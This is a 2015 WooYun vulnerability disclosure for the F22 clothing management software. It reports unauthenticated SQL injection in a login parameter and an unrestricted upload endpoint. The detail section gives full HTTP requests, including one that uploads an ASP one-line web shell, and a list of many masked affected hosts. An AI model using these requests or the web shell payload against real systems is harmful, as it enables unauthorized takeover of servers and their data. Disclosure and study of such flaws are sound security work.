当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139351

漏洞标题:某服装管理系统存在SQL注入&一处无限制Getshel(都无需登录DBA权限)

相关厂商:广州志华环讯软件科技有限公司

漏洞作者: 路人甲

提交时间:2015-09-16 10:17

修复时间:2015-12-17 14:00

公开时间:2015-12-17 14:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-16: 细节已通知厂商并且等待厂商处理中
2015-09-18: 厂商已经确认,细节仅向厂商公开
2015-09-21: 细节向第三方安全合作伙伴开放
2015-11-12: 细节向核心白帽子及相关领域专家公开
2015-11-22: 细节向普通白帽子公开
2015-12-02: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

rt

详细说明:

F22服装管理软件
一处注入,无需登录DBA权限

POST / HTTP/1.1
Host: **.**.**.**:8888
Content-Length: 694
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**:8888
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**:8888/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
__VIEWSTATE=%2FwEPDwUKLTU3MzU4MDE3Mw9kFgICAw9kFggCAQ8QZA8WAWYWARAFDOiHquWKqOivhuWIqwUM6Ieq5Yqo6K%2BG5YirZ2RkAgMPD2QWAh4Jb25rZXlkb3duBSByZXR1cm4ganVtcE5leHQuY2FsbCh0aGlzLGV2ZW50KWQCBQ8PZBYCHwAFIHJldHVybiBqdW1wTmV4dC5jYWxsKHRoaXMsZXZlbnQpZAIHDw9kFgIfAAUgcmV0dXJuIGp1bXBOZXh0LmNhbGwodGhpcyxldmVudClkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQRidG9r6WptDiQ9vTtaZjd4ZBA27uBZCx6p87oJHjFH%2Bx5fNw4%3D&__VIEWSTATEGENERATOR=999D6048&__EVENTVALIDATION=%2FwEWBwKqporlCQKT1cKmBAK0ysq%2BAgKm5IyfBwKg1t%2FLAQKti6zYCwKT%2Bp7DBwT6LFeQC9UjEiRuKZAEw6JtUHGK8lEZhG8XHZbtjTkq&DDList=%E8%87%AA%E5%8A%A8%E8%AF%86%E5%88%AB&TxtChangepwd=123456&tbuser=123456&tbpwd=123456&btok.x=40&btok.y=17&ServerDate=2015-09-06


登录框里面的参数TxtChangepwd存在注入(如下案例里每个系统跑注入时需重新抓包)
一处无限制GETSHELL,无需登录

/cutesoft_client/uploadfile.aspx


POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: **.**.**.**:8888
Content-Length: 664
Origin: http://**.**.**.**:8888
X-Requested-With: ShockwaveFlash/**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6
Accept: */*
Referer: http://**.**.**.**:8888/cutesoft_client/uploadfile.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
------------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6
Content-Disposition: form-data; name="Filename"
1.asp.jgp
------------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6
Content-Disposition: form-data; name="fileext"
*.jpg;*.gif;*.png;*.jpeg
------------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6
Content-Disposition: form-data; name="folder"
/oa/file/news
------------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6
Content-Disposition: form-data; name="Filedata"; filename="1.asp"
Content-Type: application/octet-stream
<%eval request("pass")%>
------------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6
Content-Disposition: form-data; name="Upload"
Submit Query
------------GI3ae0ae0GI3Ef1KM7ae0KM7KM7gL6--

漏洞证明:

aaaaaaaaaaaaaaaa111111111111111111.jpg


aaaaaaaaaaaaaaa22222222222222222.jpg


aaaaaaaaaaaaaa3333333333333333333.jpg


aaaaaaaaaaaaaa44444444444444444.jpg


aaaaaaaaaaaaaa5555555555555555.jpg


aaaaaaaaaaaaaaa66666666666666666.jpg


aaaaaaaaaaaaaaa66666666666666666666.jpg


案例:

**.**.**.**:8000/
**.**.**.**:8888/
**.**.**.**:8080/
**.**.**.**:8888/
**.**.**.**/
http://**.**.**.**/
**.**.**.**/
**.**.**.**/
http://**.**.**.**:8088/
**.**.**.**/
**.**.**.**:8080/
**.**.**.**:8888/
http://**.**.**.**/
**.**.**.**:81/
**.**.**.**:81/
**.**.**.**/
**.**.**.**:8000/
**.**.**.**/
**.**.**.**:8888/
http://**.**.**.**/
**.**.**.**:8000/
**.**.**.**/
http://**.**.**.**:8081/
**.**.**.**:81/
http://**.**.**.**/
**.**.**.**:81/
**.**.**.**/
**.**.**.**:8888/
**.**.**.**:8081/
**.**.**.**:8086/
**.**.**.**:8081/
**.**.**.**:8081/
http://**.**.**.**:8081/
**.**.**.**:8081/
http://**.**.**.**:8088/
**.**.**.**:8888/
**.**.**.**:8088/
**.**.**.**:8081/
**.**.**.**:8081/
**.**.**.**:8081/
**.**.**.**:8081/
**.**.**.**:8081/
**.**.**.**:8081/
**.**.**.**:8081/
**.**.**.**:8081/
**.**.**.**:8080/
**.**.**.**:88/
**.**.**.**:88/
**.**.**.**:81/
**.**.**.**:81/
**.**.**.**:88/
**.**.**.**:88/
**.**.**.**:88/
**.**.**.**:88/
**.**.**.**:88/
**.**.**.**:88/
**.**.**.**:88/
**.**.**.**:88/
**.**.**.**:88/
**.**.**.**:88/
**.**.**.**:88/
**.**.**.**:88/
http://**.**.**.**:8888/
http://**.**.**.**:88/
**.**.**.**:8081/
http://**.**.**.**:88/

修复方案:

sql过滤提交的参数
getshel问题,添加权限限制访问

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-09-18 13:58

厂商回复:

暂未建立与软件生产厂商的直接处置渠道,待认领.

最新状态:

暂无